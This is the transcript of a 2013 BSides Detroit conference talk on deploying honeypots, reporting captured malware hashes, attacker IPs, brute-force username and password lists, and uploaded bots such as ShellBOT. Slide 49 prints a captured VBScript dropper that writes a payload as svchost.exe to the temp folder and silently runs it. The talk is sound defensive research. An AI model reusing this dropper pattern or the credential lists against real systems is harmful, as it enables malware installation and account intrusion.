Your SlideShare is downloading. ×
Bsides detroit 2013   honeypots
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Bsides detroit 2013 honeypots

897
views

Published on

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
897
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
10
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • RECALCULATE!! Somehow my Excel sorting and calculating may be off a bit.
  • Transcript

    • 1. Be vewy, vewy quiet….let’s watch some hackers..
    • 2. Interactive portion introWhoamiWhat is a Honeypot?Different HoneypotsWhy Honeypots?Things I discoveredStratagemInteractive portion end results
    • 3. Interactive portionSSID – FBI MobileIP address – 192.168.2.5User ID – bsidesThe password is…detroit (told you it was easy)
    • 4. FatherHusband
    • 5. GeekAntagonist of the shiny things
    • 6. ShadowServer.org volunteerSecurity analystWhoami
    • 7. A Honeypot is an informationsystem resource whose value lies inunauthorized or illicit use of thatresource. (May 2003)
    • 8. Why Honeypots?
    • 9. Why Honeypots?
    • 10. Low interactionServer HoneypotsHoneyD
    • 11. Low interactionServer HoneypotsConpot
    • 12. Different HoneypotsClientside Honeypots
    • 13. Windows XP SP 0 Windows Vista SP 0Client HoneypotsHigh InteractionDifferent Honeypots
    • 14. Initial Research
    • 15. A word of advice on using an EC2instance.
    • 16. GeoIP locationDionaea - Ireland
    • 17. Dionaea statsStarted  3/7/2013Stopped 3/9/2013Started  3/12/2013Stopped  3/14/2013Graphs are courtesy of DionaeaFRtool
    • 18. Dionaea stats• Don’t forget to add your API key from VirusTotal to yourconfig file!!• If you don’t add the API key, then the pretty visualization tool can’t doit’s job and you have to do manually!!!
    • 19. 1441097156171414998Dionaea statsTop 10 IP addresses
    • 20. Wireshark AnalysisAttack Attempts
    • 21. Malware CapturesMD5 Virus TotalDetectionRatioCommon name Source IP Address/WhoIs78c9042bbcefd65beaa0d40386da9f8944 / 46 Microsoft -Worm:Win32/Conficker.C• 209.190.25.37• XLHost – VPS provider• http://www.xlhost.com/7acba0d01e49618e25744d9a08e6900c45 / 46 Microsoft -Worm:Win32/Conficker.B69.28.137.10LimeLight Networks - a DigitalPresence Management companyhttp://www.limelight.com/90c081de8a30794339d96d64b86ae19442 / 43 Kaspersky -Backdoor.Win32.Rbot.aftu69.38.10.83WindStream Communications –Voice and data providerhttp://NuVox.netbcaef2729405ae54d62cb5ed097efa1243 / 44 Kaspersky -Backdoor.Win32.Rbot.bqj69.9.236.128Midwest Communications –Comcast/WideOpenWest parallelhttp://midco.net/
    • 22. GeoIP locationDionaea - recent
    • 23. Dionaea •Detection
    • 24. Dionaea •Detection
    • 25. Dionaea •Detection
    • 26. KippoStarted  2/27/2013Stopped  3/1/2013IP addresses• 14 unique IP addresses• Maximum password attempts – 1342• Successful logins – 7• Replay scripts – 1•Files uploaded - 1
    • 27. 1342119045416316315628 2216541 1Kippo stats2/27 to 3/1Attackers IP addresses/connection attempts
    • 28. GeoIP locationKippo – recent
    • 29. Kippo statsrootbinoracletestnagiosmartintoorftpuseruserpostgresinfowebmasterapachebackupguestr00tpublicgreendemositejeffandyi-heartuser0content18566717 10 9 6 6 6 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 3Top 25 User names2/27 – 3/1Times tried
    • 30. Kippo stats27169 9 987 7 7 7 7 7 7 7 7 7 76 6 6Top 25 Passwords2/27 to 3/1Tries
    • 31. Kippo statsAccounts that used 123456 aspasswordUser ID Triesroot 7ftpuser 3oracle 3andy 2info 2jeff 2site 2test 2webmaster 2areyes 1brian 1“7 successful logons? But your chart says 27 used the password of123456?! WTF?”
    • 32. Kippo statsroot ├╢├Ä├ä┬Ñ├╛.├▓├ä┬┐├é┬Ñ root !Q@W#E$root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs root !Q@W#E$Rroot $hack4m3baby#b1gbroth3r$ root !Q@W#E$R%root 654321 root !Q@W#E$R%Troot Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD root !Q@W#E$R%T^root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!& root !Q@W#E$R%T^Yroot diffie-hellman-group-exchange-sha11 root !Q@W#E$R%T^Y&root 123 root !Q@W#E$R%T^Y&Uroot 1234 root !Q@W#E$R%T^Y&U*root 12345 root !Q@W#E$R%T^Y&U*Iroot 1234567 root !Q@W#E$R%T^Y&U*I(root 12345678 root !Q@W#E$R%T^Y&U*I(Oroot 123456789 root !Q@W#E$R%T^Y&U*I(O)root deathfromromaniansecurityteamneversleepba root !Q@W#E$R%T^Y&U*I(O)Proot rooooooooooooooooooooooooooooooooot root !Q@W#E$R%T^Y&U*I(O)P_Interesting passwords
    • 33. Kippo statsFile downloadedpsyBNC 2.3.2------------This program is useful for people who cannot be on irc all the time.Its used to keep a connection to irc and your irc client connected, oralso allows to act as a normal bouncer by disconnecting from the ircserver when the client disconnects.
    • 34. KippoStarted  5/31/2013Stopped  6/1/2013IP addresses• Unique IP addresses - 20• Maximum password attempts – 1098• Successful logins – 16• Replay scripts – 4•Files uploaded - 1
    • 35. 670398273908864622825135 5 42211111Kippo stats5/31 to 6/1Attackers IP addresses/connection attempts
    • 36. 221210 109 9 9 98 87 7 7 76 6 6 6 6 6 6 6 65 5Top 25 passwords5/31 to 6/1AttemptsKippo stats
    • 37. 118417 15 11 8 8 7 6 6 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4Top 25 user names5/31 to 6/1Login attemptsKippo stats
    • 38. Kippo statsReplay script – 20130603-104907-9177.logJust trying to run Perl
    • 39. Kippo statsReplay script – 20130530-134418-3935.logUpload of shellbot.pl
    • 40. Kippo statsFile downloaded#!/usr/bin/perl## ShellBOT by: devil__Discovered: June 3, 2005Updated: April 30, 2010 3:46:09 AMType: TrojanSystems Affected:Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, WindowsNT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XPBackdoor.Shellbot is a detection name used by Symantec to identify malicioussoftware programs that share the primary functionality of enabling a remoteattacker to have access to or send commands to a compromised computer.As the name suggests, these threats are used to provide a covert channelthrough which a remote attacker can access and control a computer. TheTrojans vary in sophistication, ranging from those that only allow for limitedfunctions to be performed to those that allow almost any action to be carriedout, thus allowing the remote attacker to almost completely take over controlof a computer.Backdoor.ShellbotRisk Level 1: Very Low
    • 41. Kippo statsReplay script – 20130602-105723-5678.logUpload a tar.gz and trips a Python reply script
    • 42. KippoDetectionCTF replay scripts
    • 43. Kippo• Config file changes• Custom reply filesLessons learned
    • 44. HoneyD
    • 45. AmunStarted  5/29Stopped  5/30IP addresses• Unique IP addresses - 3• Files uploaded - 2
    • 46. AmunAzenv.php (uploaded twice)• ProxyJudge scriptFiles uploaded
    • 47. Thug• Honeyclient• Mimics client behavior• Browser• Plug-ins for 3rd party apps
    • 48. MwcrawlerPE32 files--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 445Infected files: 44Data scanned: 510.42 MBData read: 353.98 MB (ratio 1.44:1)Time: 147.925 sec (2 m 27 s)Data--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 4Infected files: 1Data scanned: 1.04 MBData read: 0.41 MB (ratio 2.57:1)Time: 7.612 sec (0 m 7 s)
    • 49. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>UntitledDocument</title> </head><body>Mwcrawler<p align="center"><h1>Were sorry,</h1><h2>The site is temporarlyunavailable. Please check in next few days</h2></p></body></html><SCRIPTLanguage=VBScript><!--DropFileName = "svchost.exe“ WriteData =<Lots of shellcode>Set FSO = CreateObject("Scripting.FileSystemObject")DropPath =FSO.GetSpecialFolder(2) & "" & DropFileNameIf FSO.FileExists(DropPath)=FalseThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData)Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSetWSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>
    • 50. How you can your netbook useful and funagain!
    • 51.  Project page Goals◦ Documentation Tools◦ Honeypots◦ Network◦ Malware◦ Forensics◦ ToolsStratagemhttp://sourceforge.net/projects/stratagem/
    • 52.  Honeypots◦ Dionaea◦ Kippo◦ Glastopf◦ HoneyD◦ Amun◦ Labrea◦ Tinyhoneypot◦ Thug◦ ConpotStratagem
    • 53.  Network◦ Scapy◦ proxychains◦ Ngrep◦ Network Miner◦ Amun◦ Xplico◦ Capanalysis◦ Network Malware◦ Mwcrawler◦ Yara◦ ClamAVStratagem Forensics◦ Volatility Tools◦ Tor◦ i2p◦ Conky◦ Guake◦ Terminator
    • 54. StratagemCapanalysis
    • 55. StratagemCapanalysis
    • 56. Next?
    • 57. Resources• A host at $IP ($location)tried to log into my honeypots fake TerminalServices server• GET-based RFI attack from $IP ($location)• A host at $IP ($location)tried to log into my honeypots fake MSSQLServerhttp://inguardians.com/
    • 58. Resources
    • 59. Resources
    • 60. http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport
    • 61. Honeydrive
    • 62. Keith Dixon@Tazdrumm3r#misec – Tazdrumm3rtazdrummer@gmail.comhttp://tazdrumm3r.wordpress.com

    ×